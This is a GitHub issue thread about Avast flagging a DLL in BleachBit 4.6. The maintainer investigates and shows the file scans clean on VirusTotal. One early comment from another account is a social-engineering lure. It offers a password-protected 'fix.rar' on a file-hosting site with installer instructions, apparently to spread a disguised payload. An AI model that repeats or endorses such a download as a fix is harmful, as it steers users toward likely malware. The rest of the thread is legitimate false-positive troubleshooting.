### ISSUE TITLE
Virus or false positive? [Avast and libgio-2.0-0.dll]

### ISSUE THREAD

**Issue by Yragha** [bleachbit/bleachbit#1712]
Downloaded latest version 4.6 and my antivirus flagged llbglo-2.0-0.dll in C\:users app data as virus IDP.HEUR26. Your help would be appreciated. Thanks.

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by az0** [comment]
> Downloaded latest version 4.6 

Do you mean 4.6.0 final or 4.6.1 beta?

>  my antivirus flagged  `llbglo-2.0-0.dll`

Do you mean `libgio-2.0-0.dll` or `libglib-2.0-0.dll` or something else?

**Comment by az0** [comment]
Third question: which antivirus software? Is it AVG?

**Comment by Yragha** [comment]
Avast flagged exactly as I typed it out, what looks like llbglo-2.0-0.dll. Yes your main version 4.6 under Windows + the Microsoft pack per instructions.

**Comment by az0** [comment]
> llbglo-2.0-0.dll

`llbglo-2.0-0.dll` does not come with BleachBit 4.6.0 (or 4.6.1).  The most similar are libgdk, libio, libglib, libgtk, and libobject.

I did a Google search for it, and there were only two results.  The result was a post on the [Avast forum from 2019](https://forum.avast.com/index.php?topic=230427.0) from 2019 . He wrote 

>My antivirus notice identified llbglo-2.0-0.dll
I have NOT been able to determine where this file came from, but I was opening Bleachbit 3.0 file cleaner run as an administrator when the popup notification occurred It has been a problem opening since updating it a week ago, and many times it would not open at all

BleachBit 3.0 did not come with that file either.

The second search result was this page on GitHub.

When downloading BleachBit, make sure you download the official version from the www.bleachbit.org web site, and it should have a [digital signature with the name Andrew Ziem like shown in this screenshot](https://docs.bleachbit.org/doc/install-on-windows.html).

If you can still find the installer or `llbglo-2.0-0.dll`, please archive it (like with zip or rar or similar), and lock it with an archive password. Then you can send it to me to take a closer look.

If you cannot, then I would uninstall BleachBit and make sure you have the official version.

**Comment by Yragha** [comment]
All official from your site. File in local, users app data labeled as such Bleachbit. Got it from Bleachbit.org. Digital signature, Andrew Ziem 11.5.23. Where would you like the installer sent to?

**Comment by az0** [comment]
> All official from your site. File in local, users app data labeled as such Bleachbit. Got it from Bleachbit.org. Digital signature, Andrew Ziem 11.5.23. Where would you like the installer sent to?

If it is signed by me, then it should be the same file as I have, so it would not help to send it to me.

Do you still have `llbglo-2.0-0.dll` under `c:\program files (x86)\bleachbit` or in the antivirus software's quarantine vault? I would be interested in a copy of that file.

**Comment by Yragha** [comment]
After diving deeper, it is libgio-2.0-0.dll that Avast flagged. Is this a file your familiar with?

**Comment by az0** [comment]
Yes, you can email it to me at ahz0001@duck.com . In case gets blocked, send me another message to let me know to expect it

**Comment by Yragha** [comment]
Sounds good. Avast in the vault in bold list it as the llbglo-2.0-0.dll but the file is actually what I just mentioned. I'm leaning false positive.  Thanks sir for all the follow up.

**Comment by az0** [comment]
I uploaded `libgio-2.0-0.dll` to virustotal to be scanned by multiple antivirus systems.

`libgio-2.0-0.dll` [from BleachBit 4.6.0](https://www.virustotal.com/gui/file/dece8f2f761de8c25591f8a7437fd622c65f002d8b4d1e18a89b8d19f7ba956f?nocache=1) tested clean from 72 scans

`libgio-2.0-0.dll` [from BleachBit 4.6.1](https://www.virustotal.com/gui/file/71ef3c2feb4c1bd3ad169077d46707a5882a6bf0690d77aa5399db02235d5c0d?nocache=1) tested clean from 72 scans

Before you email me the file, [upload it to VirusTotal](https://www.virustotal.com/gui/home/upload), and send me the URL. The URL should start with `https://www.virustotal.com/gui/file` followed by a really long hexadecimal string. If its the original dll, then it should match one of the two links I posted in this comment (either 4.6.0 or 4.6.1).

**Comment by az0** [comment]
Would you please check for the libgio error in Avast in [BleachBit 4.6.2](https://www.bleachbit.org/news/bleachbit-442)?

**Comment by az0** [comment]
Closing because on Sep 10 you sounded satisfied
